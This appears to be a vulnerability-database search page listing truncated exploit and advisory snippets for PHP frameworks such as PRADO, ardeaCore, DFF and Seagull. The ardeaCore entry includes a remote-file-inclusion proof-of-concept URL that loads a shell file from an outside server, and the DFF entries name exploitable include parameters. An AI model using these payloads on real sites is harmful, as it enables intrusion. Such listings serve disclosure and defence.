335 matches found
Seagull PHP Framework <= 0.6.4 (fckeditor) Arbitrary File Upload Exploit
No description provided by source. ?php / ------------------------------------------------------------------------ Seagull PHP Framework = 0.6.4 fckeditor Arbitrary File Upload Exploit ------------------------------------------------------------------------ author...: EgiX mail.....:...
Debian Security Advisory DSA 2853-1 (horde3 - remote code execution)
Pedro Ribeiro from Agile Information Security found a possible remote code execution on Horde3, a web application framework. Unsanitized variables are passed to the unserialize PHP function. A remote attacker could specially-craft one of those variables allowing her to load and execute code...
PRADO PHP Framework <= 3.2.0 Multiple Directory Traversal Vulnerabilities - Active Check
PRADO PHP Framework is prone to multiple directory traversal vulnerabilities. SPDX-FileCopyrightText: 2012 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...
PRADO PHP Framework 3.2.0 Arbitrary File Read Vulnerability
Summary PRADO is a component-based and event-driven programming framework for developing Web applications in PHP 5. PRADO stands for PHP Rapid Application Development Object-oriented. Description Input passed to the 'sr' parameter in 'functionaltests.php' is not properly sanitised before being us...
PRADO PHP Framework 3.2.0 File Read
PRADO PHP Framework 3.2.0 Arbitrary File Read Vulnerability Vendor: Prado Software Product web page: http://www.pradosoft.com Affected version: 3.2.0 r3169 Summary: PRADO is a component-based and event-driven programming framework for developing Web applications in PHP 5. PRADO stands for PHP Rap...
PRADO PHP Framework 3.2.0 - Arbitrary File Read
PRADO PHP Framework 3.2.0 - Arbitrary File Read PRADO PHP Framework 3.2.0 Arbitrary File Read Vulnerability Vendor: Prado Software Product web page: http://www.pradosoft.com Affected version: 3.2.0 r3169 Summary: PRADO is a component-based and event-driven programming framework for developing Web...
PyroCMS 2.1.1 CRLF Injection And Stored XSS Vulnerability
Summary PyroCMS is a CMS built using the CodeIgniter PHP framework. Using an MVC architecture it was built with modularity in mind. Lightweight, themeable and dynamic. Description PyroCMS suffers from a stored XSS and HTTP Response Splitting vulnerability when parsing user input to the 'title' an...
Prado TJavaScript::encode() script injection vulnerability
Prado TJavaScript::encode script injection vulnerability Vulnerability severity : medium Vulnerability type : cross-site script injection attack cookie theft session hijacking stealing of sensitive information Remotely exploitable : yes Vulnerability discovery date : 2012/03/07 Vulnerability...
Elefant CMS 1.0.2 Cross Site Scripting
elefantcms vendor: http://www.elefantcms.com Version: Latest stable release: 1.0.2 Author: Karthik R 3psil0nLambDa Email: [email protected] My blog: www.epsilonlambda.wordpress.com Google dork: Powered by Elefant CMS...
Remote file inclusion
PHP remote file inclusion vulnerability in ardeaCore/lib/core/ardeaInit.php in ardeaCore PHP Framework 2.2 allows remote attackers to execute arbitrary PHP code via a URL in the pathForArdeaCore parameter. NOTE: some of these details are obtained from third party information...
CVE-2010-4998
CVE-2010-4998 affects the ardeaCore PHP Framework 2.2. A PHP remote file inclusion flaw in ardeaCore/lib/core/ardeaInit.php allows an attacker to execute arbitrary PHP code via a URL supplied to the pathForArdeaCore parameter. NVD records a base CVSS v2 score of 7.5 (HIGH) with network access and...
ardeaCore_v2.25 PHP Framework Remote File Inclusion
Exploit for php platform in category web applications ! Discovered: n0n0x ! Homepage: http://priasantai.uni.cc/ ! Remote: yes Hello gay x PoC: http://host/ardeaCorev2.25/ardeaCore/lib/core/ardeaInit.php?pathForArdeaCore=http://server/shell.tmp???...
CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit
$Id: cakephpcachecorruption.rb 11074 2010-11-19 20:43:56Z swtornio $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use...
Remote file inclusion
Multiple PHP remote file inclusion vulnerabilities in DataFeedFile DFF PHP Framework API allow remote attackers to execute arbitrary PHP code via a URL in the DFFconfigdirinclude parameter to 1 DFFaffiliateclientAPI.php, 2 DFFfeaturedprdt.func.php, 3 DFFmer.func.php, 4 DFFmerprdt.func.php, 5...
DFF PHP Framework API (Data Feed File) RFI Vulnerabilities
No description provided by source. DFF PHP Framework API Data Feed File Multiple Inclusion Vulnerabilities Script :http://opensource.datafeedfile.com/download/DFFPHPFrameworkAPI-latest.zip Exploits : /DFFPHPFrameworkAPI-latest/include/DFFaffiliateclientAPI.php?DFFconfigdirinclude=...
DFF PHP Framework API - Data Feed File Remote File Inclusion
DFF PHP Framework API - Data Feed File Remote File Inclusion DFF PHP Framework API Data Feed File Multiple Inclusion Vulnerabilities Script :http://opensource.datafeedfile.com/download/DFFPHPFrameworkAPI-latest.zip Exploits :...
DFF PHP Framework API (Data Feed File) RFI Vulnerabilities
Exploit for unknown platform in category web applications ========================================================== DFF PHP Framework API Data Feed File RFI Vulnerabilities ========================================================== DFF PHP Framework API Data Feed File Multiple Inclusion...
dffphp-rfi.txt
DFF PHP Framework API Data Feed File Multiple Inclusion Vulnerabilities Script :http://opensource.datafeedfile.com/download/DFFPHPFrameworkAPI-latest.zip Exploits : /DFFPHPFrameworkAPI-latest/include/DFFaffiliateclientAPI.php?DFFconfigdirinclude=...
DFF PHP Framework API - 'Data Feed File' Remote File Inclusion
DFF PHP Framework API Data Feed File Multiple Inclusion Vulnerabilities Script :http://opensource.datafeedfile.com/download/DFFPHPFrameworkAPI-latest.zip Exploits : /DFFPHPFrameworkAPI-latest/include/DFFaffiliateclientAPI.php?DFFconfigdirinclude=...
Seagull PHP Framework <= 0.6.4 (fckeditor) Arbitrary File Upload Exploit
No description provided by source. ?php / ------------------------------------------------------------------------ Seagull PHP Framework = 0.6.4 fckeditor Arbitrary File Upload Exploit ------------------------------------------------------------------------ author...: EgiX mail.....:...